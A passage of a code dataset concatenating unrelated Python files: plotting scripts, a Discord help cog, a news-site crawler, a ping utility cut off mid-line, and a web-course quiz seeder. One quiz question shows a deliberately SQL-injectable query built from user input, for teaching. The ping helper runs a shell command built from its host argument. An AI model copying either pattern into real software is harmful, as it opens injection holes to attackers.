matrix_histogram_complex(\n M,\n xlabels=None,\n ylabels=None,\n labelsize=12,\n title=None,\n limits=None,\n phase_limits=None,\n colorbar=True,\n fig=None,\n ax=None,\n threshold=None,\n azim=-30,\n elev=30,\n force_zorder=True,\n scale_x=1,\n scale_y=1,\n scale_z=1\n):\n \"\"\"\n Draw a histogram for the amplitudes of matrix M, using the argument\n of each element for coloring the bars, with the given x and y labels\n and title.\n\n Parameters\n ----------\n M : Matrix of Qobj\n The matrix to visualize\n\n xlabels : list of strings\n list of x labels\n\n ylabels : list of strings\n list of y labels\n\n title : string\n title of the plot (optional)\n\n limits : list/array with two float numbers\n The z-axis limits [min, max] (optional)\n\n phase_limits : list/array with two float numbers\n The phase-axis (colorbar) limits [min, max] (optional)\n\n ax : a matplotlib axes instance\n The axes context in which the plot will be drawn.\n\n threshold: float (None)\n Threshold for when bars of smaller height should be transparent. If\n not set, all bars are colored according to the color map.\n\n Returns\n -------\n fig, ax : tuple\n A tuple of the matplotlib figure and axes instances used to produce\n the figure.\n\n Raises\n ------\n ValueError\n Input argument is not valid.\n\n \"\"\"\n\n if isinstance(M, Qobj):\n # extract matrix data from Qobj\n M = M.full()\n\n n = np.size(M)\n xpos, ypos = np.meshgrid(range(M.shape[0]), range(M.shape[1]))\n xpos = xpos.T.flatten() - 0.4\n ypos = ypos.T.flatten() - 0.4\n zpos = np.zeros(n)\n dx = dy = 0.8 * np.ones(n)\n Mvec = M.flatten()\n dz = abs(Mvec)\n\n # make small numbers real, to avoid random colors\n idx, = np.where(abs(Mvec) < 0.001)\n Mvec[idx] = abs(Mvec[idx])\n\n if phase_limits: # check that limits is a list type\n phase_min = phase_limits[0]\n phase_max = phase_limits[1]\n else:\n phase_min = -pi\n phase_max = pi\n\n norm = mpl.colors.Normalize(phase_min, phase_max)\n cmap = complex_phase_cmap() # plt.get_cmap('twilight')\n\n colors = cmap(norm(angle(Mvec)))\n if threshold is not None:\n colors[:, 3] = 1 * (dz > threshold)\n\n if ax is None:\n if fig is None:\n fig = plt.figure()\n\n ax = Axes3D(fig, azim=azim, elev=elev)\n\n for x in range(M.shape[0]):\n for y in range(M.shape[1] - 1, -1, -1):\n i = x * M.shape[1] + y\n ax.bar3d(xpos[i], ypos[i], zpos[i], dx[i], dy[i], dz[i], color=colors[i])\n\n if title and fig:\n ax.set_title(title)\n\n # x axis\n ax.axes.w_xaxis.set_major_locator(plt.IndexLocator(1, 0.4))\n if xlabels is None:\n xlabels = list(map(str, range(M.shape[0])))\n ax.set_xticklabels(xlabels, verticalalignment='center', horizontalalignment='right')\n ax.tick_params(axis='x', labelsize=labelsize, labelrotation=13)\n\n # y axis\n ax.axes.w_yaxis.set_major_locator(plt.IndexLocator(1, 0.4))\n if ylabels is None:\n ylabels = list(map(str, range(M.shape[1])))\n ax.set_yticklabels(ylabels, verticalalignment='center', horizontalalignment='left')\n ax.tick_params(axis='y', labelsize=labelsize, labelrotation=-34)\n # ax.set_ylabel('光子数', fontsize=15)\n\n # z axis\n if limits is None:\n limits = [0, 1]\n correction = (limits[1] - limits[0]) / 49\n ax.set_zlim3d([limits[0] + correction, limits[1]])\n # ax.set_zlabel('絶\\n対\\n値', fontsize=15, rotation=0)\n # ax.zaxis.set_rotate_label(False)\n ax.zaxis._axinfo['juggled'] = (1, 2, 0)\n ax.tick_params(axis='z', labelsize=12)\n\n # color axis\n if colorbar:\n cax, kw = mpl.colorbar.make_axes(ax, shrink=.75, pad=.0)\n cb = mpl.colorbar.ColorbarBase(cax, cmap=cmap, norm=norm)\n cb.set_ticks([-pi, -pi / 2, 0, pi / 2, pi])\n cb.set_ticklabels((r'$-\\pi$', r'$-\\pi/2$', r'$0$', r'$\\pi/2$', r'$\\pi$'))\n cb.ax.tick_params(labelsize=12) \n # cb.set_label('偏\\n角', fontsize=15, rotation=0, verticalalignment='center', horizontalalignment='right')\n\n ax.get_proj = lambda: np.dot(Axes3D.get_proj(ax), np.diag([scale_x, scale_y, scale_z, 1]))\n\n return fig, ax\n","sub_path":"libys/qtp.py","file_name":"qtp.py","file_ext":"py","file_size_in_byte":7517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"641886139","text":"\nimport inp_seq\n\nseqs = [\"\", '']\n\n\n# takes a long string and breaks it into lines of 60 chars\ndef break_into_lines(strin):\n out1 = \"\"\n i = 0\n for char in strin:\n if i == 60:\n i = 0\n out1 = out1 + \"\\n\" + char\n else:\n i = i + 1\n out1 = out1 + char\n return out1\n\n\n# if the user wants txt output, this function will be called\ndef plain(data, infile, outfile):\n global seqs\n\n # get the input sequence labels\n seqs = inp_seq.main(infile)\n labels = []\n with open(infile, 'r') as fin:\n for line in fin:\n if line[0] == '>':\n labels.append(line[1:-1])\n\n # get the input sequence length\n lens = [len(seqs[0]), len(seqs[1])]\n\n # get the list of symbols the appear between the two input sequences\n compsym = \"\"\n for i in range(0, len(data[0][0])):\n if data[0][0][i] == '-' or data[0][1][i] == '-':\n compsym = compsym + \" \"\n elif data[0][0][i] == data[0][1][i]:\n compsym = compsym + '|'\n elif data[0][0][i] != data[0][1][i]:\n compsym = compsym + '.'\n\n # write this information to outfile\n fout = open(outfile, 'w')\n fout.write(\"Input seqs: \")\n fout.write(labels[0] + \" (len=\" + str(lens[0]-1) + \")\" + \"; \")\n fout.write(labels[1] + \" (len=\" + str(lens[1]-1) + \")\\n\")\n fout.write(\"Alignment length=\" + str(len(data[0][0])) + \"; \")\n fout.write(\"Identity = \" + str(int(data[1])) + \"%\\n\\n\")\n out1 = break_into_lines(data[0][0]).split('\\n')\n out2 = break_into_lines(compsym).split('\\n')\n out3 = break_into_lines(data[0][1]).split('\\n')\n\n # for long output sequences, split it into groups of 60 for readability\n i = 0\n for i in range(0, len(out1)):\n fout.write(out1[i] + \"\\n\")\n fout.write(out2[i] + \"\\n\")\n fout.write(out3[i] + \"\\n\\n\")\n\n\n# if the user wants fasta output, this function will be called\ndef fasta(data, infile, outfile):\n\n # get the labels that will describe each seq in the outfile\n labels = []\n with open(infile, 'r') as fin:\n for line in fin:\n if line[0] == '>':\n labels.append(line)\n fout = open(outfile, 'w')\n\n # break the output into lines for readability\n out1 = break_into_lines(data[0][0])\n out2 = break_into_lines(data[0][1])\n\n # write the outfile\n fout.write(labels[0])\n fout.write(str(out1) + \"\\n\")\n fout.write(\"\\n\" + labels[1])\n fout.write(str(out2) + \"\\n\")\n","sub_path":"write_out.py","file_name":"write_out.py","file_ext":"py","file_size_in_byte":2480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"313264898","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.lines import Line2D\nimport numpy as np\nimport os\nfrom pylab import *\nfrom matplotlib import ticker\nfrom matplotlib.ticker import ScalarFormatter\nsformatter=ScalarFormatter(useOffset=True,useMathText=True)\nsformatter.set_scientific(True)\nsformatter.set_powerlimits((-2,3))\n\n#plt.ticklabel_format(style='sci', axis='y', scilimits=(0,0))\n\nfont = {'family' : 'serif',\n 'weight' : 'normal',\n 'size' : 14}\nplt.rc('font', **font)\nplt.rc('text', usetex=False)\nplt.figure(figsize=(6,5))\nfig = plt.figure(1)\nax = fig.add_axes([0.14,0.125,0.82,0.85])\n\n\nnroots=7\nnruns=10\ntags=[\"eta0.3\",\"eta0.4\",\"eta0.5\",\"eta1.0\"]\nrhoB=0.0373777 #[0.143511,0.0942362,0.0525105,0.0373777,0.0255775,0.0159063,0.00497411]\nT=[143.45,149.53,153.4,154.45,155.08,155.44,155.66]\ncolors=['r','g','b','k']\nn=0\nstderrK=[]\nstderrS=[]\n\nfor tag in tags:\n stderrK.append([])\n stderrS.append([])\n Ssigma_avg=[]\n Ksigma2_avg=[]\n for i in range(nroots):\n sumS=0\n sumK=0\n Omega=[]\n pbar=[]\n sigma2p=[]\n Ssigmap=[]\n Ksigma2p=[]\n Skellamp=[]\n Ssigma_avg.append(0)\n Ksigma2_avg.append(0)\n\n file=\"../moments_rhoB/T\"+str(i)+tag+\".dat\";\n mydata = np.loadtxt(file,skiprows=1,unpack=True)\n for run in range(nruns):\n Omega.append(mydata[0][run])\n\n pbar.append(mydata[5][run])\n sigma2p.append(mydata[6][run])\n Ssigmap.append(mydata[7][run])\n Ksigma2p.append(mydata[8][run])\n\n Skellamp.append(sigma2p[run]/(pbar[run]*Omega[run]))\n\n Ssigma_avg[i]+=Ssigmap[run]*Skellamp[run]\n Ksigma2_avg[i]+=Ksigma2p[run]\n\n Ssigma_avg[i]*=1/nruns\n Ksigma2_avg[i]*=1/nruns\n\n for run in range(nruns):\n sumS+=(Ssigmap[run]*Skellamp[run]-Ssigma_avg[i])**2\n sumK+=(Ksigma2p[run]-Ksigma2_avg[i])**2\n\n stderrS[n].append((1/nroots)*np.sqrt(sumS))\n stderrK[n].append((1/nroots)*np.sqrt(sumK))\n\n #print(\"Ksigma2 error =\",stderrK,\", Ssigma error =\",stderrS)\n\n plt.errorbar(T,Ssigma_avg,stderrS[n],linestyle='-',linewidth=2,color=colors[n],markersize=8, marker='s', markerfacecolor=None, markeredgecolor=None,label=tag+': $C_3/C_1$')\n plt.errorbar(T,Ksigma2_avg,stderrK[n],linestyle='--',linewidth=2,color=colors[n],markersize=10, marker='^', markerfacecolor=None, markeredgecolor=None,label=tag+': $C_4/C_2$')\n\n n+=1\n\nax.tick_params(axis='both', which='major', labelsize=14)\nax.set_xticks(np.arange(140,160,5), minor=False)\nax.set_xticklabels(np.arange(140,160,5), minor=False, family='serif')\nax.set_xticks(np.arange(140,160,5), minor=True)\nax.xaxis.set_major_formatter(ticker.FormatStrFormatter('%d'))\nax.xaxis.set_major_formatter(sformatter)\nplt.xlim(140,160)\n\nax.set_yticks(np.arange(-1,1.5,0.5), minor=False)\nax.set_yticklabels(np.arange(-1,1.5,0.5), minor=False, family='serif')\nax.set_yticks(np.arange(-1,1.5,0.05), minor=True)\nplt.ylim(0.0,1.05)\nax.yaxis.set_major_formatter(ticker.FormatStrFormatter('%1f'))\nax.yaxis.set_major_formatter(sformatter)\n\nax.legend(loc=(0.1,0.05));\n\nplt.xlabel('T (MeV)',fontsize=18 , weight='normal')\nplt.ylabel('$S\\sigma$, $\\kappa\\sigma^2$', fontsize=24, weight='normal')\nplt.savefig('moments_bw_vsT_fixedrhoB.pdf',format='pdf')\nos.system('xdg-open moments_bw_vsT_fixedrhoB.pdf')\n\n\n\n#plt.show()\nquit()\n","sub_path":"figs/moments_vsT_fixedrhoB.py","file_name":"moments_vsT_fixedrhoB.py","file_ext":"py","file_size_in_byte":3406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"19594078","text":"import discord\r\nfrom discord.ext import commands\r\n\r\nimport json\r\n\r\nfrom Chess_Bot import constants\r\n\r\n\r\nclass Help(commands.Cog):\r\n\r\n def __init__(self, client: commands.Bot):\r\n self.client = client\r\n\r\n def get_default_help_embed(self):\r\n embed = discord.Embed(title='Help', color=0x02b022)\r\n\r\n embed.set_footer(\r\n text=\"Usage syntax: <required argument>, [optional argument]\")\r\n embed.set_thumbnail(url=constants.AVATAR_URL)\r\n\r\n return embed\r\n\r\n def make_help_embed(self, *, name, description, usage, examples=None, cooldown=None, aliases=None, subcommands=None):\r\n embed = self.get_default_help_embed()\r\n embed.title += f' for command \"${name}\"'\r\n if aliases is not None:\r\n embed.add_field(name='Aliases', value=', '.join([f'`{i}`' for i in aliases]))\r\n if subcommands is not None:\r\n embed.add_field(name='Subcommands:', value='\\n'.join([f'`{name} {i}`' for i in subcommands]))\r\n embed.add_field(name=\"Usage:\", value=f'`{usage}`', inline=False)\r\n embed.add_field(name=\"Description:\", value=description, inline=False)\r\n if examples is not None:\r\n embed.add_field(name=\"Examples:\", value='\\n'.join([f'`{i}`' for i in examples]), inline=False)\r\n if cooldown is not None:\r\n embed.add_field(name=\"Cooldown:\", value=f'{cooldown} seconds')\r\n return embed\r\n\r\n @commands.command()\r\n @commands.cooldown(1, 2, commands.BucketType.user)\r\n async def help(self, ctx, *, command=None):\r\n '''\r\n {\r\n \"name\": \"help\",\r\n \"description\": \"Sends a list of all commands.\\\\nUse `$help [command]` to get more information about a specific command.\",\r\n \"usage\": \"$help [command]\",\r\n \"examples\": [\r\n \"$help\",\r\n \"$help move\"\r\n ],\r\n \"cooldown\": 3\r\n }\r\n '''\r\n if command is None:\r\n embed = self.get_default_help_embed()\r\n embed.description = 'List of commands. Type `$help [command]` for more information about a certain command'\r\n\r\n embed.add_field(\r\n name='Playing', value='`challenge`, `move`, `profiles`, `resign`, `view`, `fen`, `time`', inline=False)\r\n embed.add_field(\r\n name='Viewing', value= '`view`, `fen`, `time`, `theme`', inline=False)\r\n embed.add_field(\r\n name='Rating', value='`rating`, `leaderboard`, `rank`, `stats`', inline=False)\r\n embed.add_field(\r\n name='Other', value='`ping`, `help`, `botinfo`, `invite`, `prefix`, `vote`')\r\n\r\n await ctx.send(embed=embed)\r\n else:\r\n cmd = self.client.get_command(command)\r\n if cmd is None or cmd.hidden or not cmd.enabled:\r\n await ctx.send('That command doesn\\'t exist!')\r\n return\r\n\r\n kwargs = json.loads(cmd.help)\r\n embed = self.make_help_embed(**kwargs)\r\n await ctx.send(embed=embed)\r\n\r\n\r\ndef setup(bot):\r\n bot.add_cog(Help(bot))\r\n","sub_path":"Chess_Bot/cogs/Help.py","file_name":"Help.py","file_ext":"py","file_size_in_byte":3093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"592305032","text":"from apps.databaseaccess.NBAStatisticsDB import NBAStatisticsDB\nfrom apps.databaseaccess.ConnectionManager import ConnectionManager\nfrom apps.ServiceFactory import ServiceFactory\nfrom apps.data.TeamEnum import TeamEnum\nfrom datetime import date\n\nserviceFactory = ServiceFactory(True)\nnbaStatisticsDBManager = NBAStatisticsDB()\nconnection_manager = ConnectionManager(serviceFactory)\nconnection = connection_manager.get_connection()\ncur = connection.cursor()\nnbaStatisticsDB = NBAStatisticsDB()\ngameId = nbaStatisticsDBManager.fetch_game_id(date(2015,10,31), TeamEnum.PHOENIX_SUNS, cur)\nprint(\"game_id: \", gameId)\n\n\np1 = 'lebron'\np2 = 'charles'\np3 = 'kevin'\np4 = 'steve'\np5 = 'matt'\n\nlist = [p1, p2, p3, p4, p5]\n\nprint((2, 3)[False])\n\n\nplayers_in_game = {}\ni = 0\nfor player in list:\n if i < 2:\n players_in_game[player] = {'slug': player, 'didstart': True}\n else:\n players_in_game[player] = {'slug': player, 'didstart': False}\n i = i + 1\n\nprint(players_in_game)\n\n\n\n\n\n","sub_path":"practice/Practice.py","file_name":"Practice.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"390583688","text":"# python imports\nimport re\nfrom urllib.parse import urljoin\n\n# local imports\nfrom crawler.source.utils import geocode, extract_xpath\nfrom crawler.source.basesource import BaseSource\nfrom crawler.source.constants import DEAD_URLS, FCC_URL\n\nproperties = {\n\t\"identifier\": \"//*[@class='copyright' and contains(text(), 'CBS Broadcasting Inc')]\",\n\t\"parent_name\": \"CBS Broadcasting Inc\",\n\t\"parent_url\":\"https://en.wikipedia.org/wiki/CBS_Television_Stations#Stations\", # \"https://www.cbscorporation.com/portfolio/cbs-television-stations/\",\n\t\"parent_sources_xpath\": \"(//table[@class='toccolours'])[1]//td/b/a/@href\",\n\t\"software_name\":\"CBS Local\",\n\t\"source_name\": \"//meta[@name='application-name']/@content\",\n\t\"address\": \"(//dt[text()='Main Studio Address:']/following-sibling::dd)[1]/text()\",\n\t\"email\": \"//a[contains(@href, 'mailto:')]/@href\",\n\t\"phone\": re.compile(r'\\d{3}-\\d{3}-\\d{4}|\\(\\d{3}\\)\\s*\\d{3}-\\d{4}'),\n\t\"source_type\": \"TV\",\n\t\"has_rss\": True,\n\t\"is_popular\": False,\n\t\"crawl_type\": \"R\",\n\t\"contact_page\": \"/contact\",\n\t\"rss_path\": \"/feed\",\n\t\"rss_xpath\":\"\",\n\t\"articles_path\": \"\",\n\t\"articles_xpath\": \"\",\n\t\"icon_xpath\": \"//link[@rel='apple-touch-icon-precomposed']/@href\",\n\t\"facebook\": \"//meta[@property='article:publisher']/@content\",\n\t\"twitter\": \"//meta[@name='twitter:site']/@content\"\n}\n\n\nclass Source(BaseSource):\n\n\tdef __init__(self, url, props=properties, page_tree=None, page_html=None, *args, **kwargs):\n\t\tsuper().__init__(url, props, page_tree, page_html, *args, **kwargs)\n\n\t@classmethod\n\tdef build_sources(cls, props=properties):\n\t\t\"\"\"\n\t\tExtract url's from Wikipedia, then visit each page\n\t\tand extract the Station URL from it's Wiki page.\n\t\t\"\"\"\n\t\tstations_wiki = extract_xpath(props['parent_url'], props['parent_sources_xpath'])\n\n\t\t# extract station website from fcc profile urls generated above\n\t\tsource_urls = []\n\t\tfor wikipage in stations_wiki:\n\t\t\tstation_url = extract_xpath(\n\t\t\t\turljoin(\"https://en.wikipedia.org/\", wikipage),\n\t\t\t\t\"//th[text()='Website']/following-sibling::td//a/@href\"\n\t\t\t)\n\t\t\tif station_url:\n\t\t\t\tsource_urls.append(station_url[0])\n\n\t\tsources = [url for url in source_urls if not url.startswith(\"http://cw\")]\n\t\treturn super().build_sources(props, sources)\n\n\tdef _get_contact_details(self):\n\t\t\"\"\"\n\t\tAddress, email and phone number can be gotten by searching\n\t\tthe homepage for the public file url and extracting the\n\t\tFCC inspection files url for each TV station and then\n\t\tchecking the tv-profile page for an address which follows\n\t\tthe station name e.g KOAT-TV\n\t\t\t\t\t\t\t 3801 Carlisle Blvd. NE\n\t\t\t\t\t\t\t Albuquerque, N.M., 87107\n\t\tand parsing it using provided xpaths\n\t\t\"\"\"\n\t\tif not self.name:\n\t\t\traise AttributeError('Can\\'t get address without paper name')\n\n\t\t# grab the fcc_public file page from the homepage\n\t\tpublicfile_page = self.page_tree.xpath(\"//a[contains(@title, 'Public File') and not(contains(@title, 'Radio'))]/@href\")[0]\n\t\t# get fcc code from publicfile page\n\t\traw_fcc_code = extract_xpath(\n\t\t\tpublicfile_page,\n\t\t\t\"//div[@class='moretext']/script/text()\"\n \t)[0]\n\t\tfcc_code = re.search(r\"'([\\w-]+)',\", raw_fcc_code).group(1)\n\n\t\t# check FCC Public Inspection File for address\n\t\tfcc_page = urljoin(FCC_URL, fcc_code)\n\t\traw_address = self._get_address_from_fcc(fcc_page)\n\n\t\t# get email\n\t\tself.email = self._get_email()\n\n\t\treturn geocode(raw_address)\n","sub_path":"source/tv/cbs_tv.py","file_name":"cbs_tv.py","file_ext":"py","file_size_in_byte":3297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"465160712","text":"import re\nimport sys\n\n\ndef verify_board(raw_result: str, expected_board: str) -> bool:\n \"\"\"raw result to output gamma, expected board to oczekiwana\n plansza na koniec dzialania programu; jezeli uzywasz jakiejs\n biblioteki do obslugi terminala albo rysujesz ramki itp\n to musisz zmodyfikowac te metoda tak, zeby sobie z tym poradzila\n Zwraca True jezeli wynik jest prawidlowy, wpp False\"\"\"\n result = (\n raw_result.encode(\"ASCII\")\n .replace(b\"\\33[0m\", b\"\")\n .replace(b\"\\33[?25h\", b\"\")\n .replace(b\"\\33[2j\", b\"\")\n\t\t.replace(b\"\\33[K\", b\"\") #New line\n\t\t.replace(b\"\\33[7m\", b\"\") #Reverse coloring\n\t\t.replace(b\"\\33[0m\", b\"\") #Clear coloring\n .replace(b\"\\33[H\", b\"\")\n .replace(b\"\\33[30;47m\", b\"\")\n .decode(\"ASCII\")\n )\n matched = re.findall(r\"(([\\.\\d]+\\n)+)\", result)\n final_board = [f for (f, s) in matched if f.count(\"\\n\") > 1][-1]\n return expected_board in final_board\n\n\ndef main(result_path: str, expected_path: str) -> int:\n with open(result_path) as f:\n result = f.read()\n with open(expected_path) as f:\n expected_board = f.read()\n\n return int(not verify_board(result, expected_board))\n\n\nif __name__ == \"__main__\":\n args = sys.argv[1:]\n if len(args) != 2:\n exit(\"Usage: python script.py gamma_output.file expected_output.file\")\n\n sys.exit(main(args[0], args[1]))\n","sub_path":"experimental/jm/interactive/verify_interactive_final_board.py","file_name":"verify_interactive_final_board.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"609492586","text":"import sys, os\n\nsys.path.append('.')\n\nfrom app import app\nfrom database import db\nfrom datetime import date\nfrom sqlalchemy.exc import IntegrityError\nfrom blueprints.lessons import Chapter\nfrom blueprints.chapter_http import AnswerForHttp\nimport json\n\nimport sqlalchemy\nimport blueprints.answers as answers\n\n\nCHAPTERS = [\n {\n 'id': '01-HTML-CSS',\n 'name' : 'HTML et CSS',\n 'end_date': date(2019, 9, 15),\n 'questions': [\n {\n 'title':\n \"In the following piece of code, list all\"\n \" the attributes of the <code>p</code> tag,\"\n \" one per line (I'm not\"\n \" asking about\"\n \" the values, give only the attributes!)? <br />\"\n \" <code><pre>\"\n \"<p id='hello' class='column-3' data-userid='42'>\"\n \"Hello world!\"\n \"</p>\"\n \"</pre></code>\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Give three tags that belong to the head section\"\n \" of an HTML page, one per line\"\n \" (i.e. between <head> and </head>).\",\n\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Describe in a few words the role of HTML and CSS.\",\n 'coefficient': 1,\n },\n {\n 'title':\n \"HTML is an acronym. What is its expanded form?\",\n 'coefficient': 0.25,\n },\n {\n 'title':\n \"What is the role of <code>&nbsp;</code>\"\n \" in an HTML file?\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"What do we have to write in HTML to render the\"\n \" <code><</code> symbol?\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Which one of the following is a <strong>valid</strong>\"\n \" piece of HTML (enter 1, 2, 3 or 4):<ol>\"\n \"<li><code><p>Lorem ipsum <em>dolor <strong>sit</strong></em> amet</p></code></li>\"\n \"<li><code><p>Lorem ipsum <html>dolor <strong>sit</strong></html> amet</p></code></li>\"\n \"<li><code><p>Lorem ipsum <em>dolor <strong>sit</em></strong> amet</p></code></li>\"\n \"<li><code><p>Lorem ipsum <em>dolor <strong>sit</strong><em> amet</p></code></li>\"\n \"</ol>\",\n\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Write a piece of HTML that displays \\\"Go to hell\\\"\"\n \" such as the text is a link to the website\"\n \" \\\"http://666.com\\\".\",\n\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'I am browsing a website at \"http://example.org/blog/\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"/userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'Warning, this is not the same question! I am browsing a website at \"http://example.org/blog/\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'Be careful! I am browsing a website at \"http://example.org/blog\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'This is the last question about urls! '\n ' I am browsing a website at \"http://example.org/blog\". What'\n ' will be the address of my browser if I click on:'\n ' <code><pre><a href=\"userlist/\"></pre></code>',\n 'coefficient': 0.25,\n },\n {\n 'title':\n 'Give a CSS selector for the <code>p</code> tags'\n ' inside a node with class <code>major</code>.',\n 'coefficient':1,\n },\n\n ],\n },\n {\n 'id': '02-Elm',\n 'name' : 'Elm',\n 'end_date': date(2019, 9, 19),\n 'questions': [\n { 'title':\n \"Write a <code>mult</code> function\"\n \" w(ith type annotation) taking two arguments and\"\n \" multiplying them.\",\n 'coefficient': 0.5,\n },\n {\n 'title':\n \"Let <code>f : String -> Int</code>\"\n \" and <code>g : List Float -> Int</code>\"\n \" be two functions. What is the type of\"\n \" <code>h</code> where:\"\n \" <pre>\"\n \" <code>h a b = f a + g b</code>\"\n \" </pre>\",\n 'coefficient': 1,\n },\n {\n 'title':\n \"How to produce the following piece of HTML in Elm?\"\n \"<pre>\"\n \" <code>\"\n \"<ul><li>Hi Marvin!</li></ul>\"\n \" </code>\"\n \"</pre>\",\n 'coefficient': 1,\n },\n {\n 'title':\n 'Write a function <code>f</code> (with'\n ' type annotation) that converts a'\n ' list of integers into a list of string. For instance'\n ' <code>f [2, 3, 5, 7] == [\"2\", \"3\", \"5\", \"7\"]</code>.'\n ' All the functions you need are in the slides.',\n 'coefficient': 1,\n },\n {\n 'title':\n '<code>ageStr</code> is a string entered by a user.'\n ' Define a variable <code>ageInt</code> which is'\n ' the conversion of <code>ageStr</code> in <code>Int</code'\n ' if it is a correct representation of an <code>Int</code>'\n ' or <code>-1</code> otherwise.',\n 'coefficient': 1,\n },\n\n ],\n },\n {\n 'id': '03-HTTP',\n 'name': 'HTTP',\n 'end_date': date(2019, 9, 26),\n 'questions': [],\n },\n {\n 'id': '04-AJAX',\n 'name': 'Json and Elm decoders',\n 'end_date': date(2019, 10, 2),\n 'questions': [\n {\n 'title':\n 'In Elm, what type do we use if we want represent'\n ' failure with an error message?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? In a <code>Result</code>,'\n ' the error and the value types'\n ' can be the same.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'Write a piece of JSON respresenting multiple'\n ' animals: Bud, a dog; Kit, a cat and Bob, a fish',\n 'coefficient': 1,\n },\n {\n 'title':\n 'JSON is an acronym. What is its expanded form?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? Json can only be use with Javascript.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? A JSON object can'\n ' <strong>only</strong> be decoded'\n ' to an Elm record containing the same number'\n ' of fields.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? A field in a JSON object can'\n ' <strong>only</strong> be decoded'\n ' to an Elm field record with the same name.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'Write out a type and a decoder for the following'\n ' piece of JSON:'\n ' <code><pre>{\\n'\n ' \"stars\": 5,\\n'\n ' \"followers\": [ \"Ford\", \"Arthur\"],\\n'\n ' \"name\": \"Marvin\"\\n'\n '}</pre></code>',\n 'coefficient': 1.5,\n }\n\n ],\n },\n {\n 'id': '05-security',\n 'name': 'User account and security',\n 'end_date': date(2019, 10, 9),\n 'questions': [\n {\n 'title':\n 'How should you store the passwords of the users in the'\n ' database?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'What mechnanism or technology does permit to'\n ' <strong>safely</strong> send the password user to the server?',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'True or false? When dealing with password hashes, it is safe'\n ' to take the same salt for all the passwords.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'Give a simple solution to mitigate the effects of a session'\n ' hijacking.',\n 'coefficient': 0.5,\n },\n {\n 'title':\n 'How are the cookies shared between the client and the'\n ' server?',\n 'coefficient': 1,\n },\n {\n 'title':\n 'True or False? A malicious user can be logged in to an account'\n ' on a website without providing the password of this account.'\n ' If true, explain how, otherwise explain why (give only the'\n '\"big idea\").',\n 'coefficient': 1,\n },\n {\n 'title':\n 'In the following piece of code, <code>form</code> is a'\n ' dictionary containing the input from the user.'\n ' You can see here a request performed in an instant messaging'\n ' software. This reuqest searches the messeages sent to a given'\n ' user among all the messages from the current user.'\n ' <pre><code>cur.execute(\"SELECT * FROM messages WHERE'\n ' to_userd_id=\\'\" + form[\"to_user_id\"] + \"\\' AND'\n ' author_id=\" + current_user.get_id())</code></pre>'\n ' What value could a malicious user use for the \"to_user\"'\n ' field in order to get all the messages in the database?',\n 'coefficient': 1.5,\n },\n {\n 'title':\n 'Rewrite this following piece of code to prevent SQL'\n ' injections:'\n ' <pre><code>cur.execute(\"SELECT * FROM messages WHERE'\n ' to_userd_id=\\'\" + form[\"to_user_id\"] + \"\\' AND'\n ' author_id=\" + current_user.get_id())</code><pre>',\n 'coefficient': 0.5,\n },\n\n ],\n },\n {\n 'id': '06-websockets',\n 'name': 'Websockets',\n 'end_date': date(2019, 10, 16),\n 'questions': [\n {\n 'title':\n 'No question for this lesson!',\n 'coefficient': 0\n }\n ]\n }\n]\n\n\nwith app.app_context():\n db.create_all()\n for chapter in CHAPTERS:\n for question in chapter['questions']:\n question['grade_by_answer'] = {}\n chapter['questions'] = json.dumps(chapter['questions'])\n\n db.session.merge(Chapter(**chapter))\n db.session.commit()\n","sub_path":"webapp/scripts/create_chapters.py","file_name":"create_chapters.py","file_ext":"py","file_size_in_byte":12489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"394018069","text":"#!/usr/bin/python3\n\nimport os\nimport re\nimport subprocess\nimport sys\nsys.path.append(sys.argv[1])\n\nimport yaml_utils\n\ndef ping(host):\n cmd = 'ping -c %d %s'%(1, host)\n p = subprocess.Popen(args=cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n out = p.stdout.read().decode()\n\n reg_receive = \"(\\d+) received\"\n match_receive = re.search(reg_receive, out)\n receive_count = -1\n\n if match_receive:\n receive_count = int(match_receive.group().split(' ')[0])\n if receive_count > 0:\n return True\n else:\n return False\n\n#input_node_name\ndef input_node_name(service_name):\n if node_num == 1:\n node_name = node_name_list[0]\n else:\n node_name = input(\"Please input run \" + service_name + \" node name (\" + str(node_name_list)[1:-1] + \"):\")\n while True:\n if node_name == \"\":\n node_name = node_name_list[0]\n if node_name in node_name_list:\n break\n else:\n node_name = input(\"Error, please input run \" + service_name + \" node name again (\" + 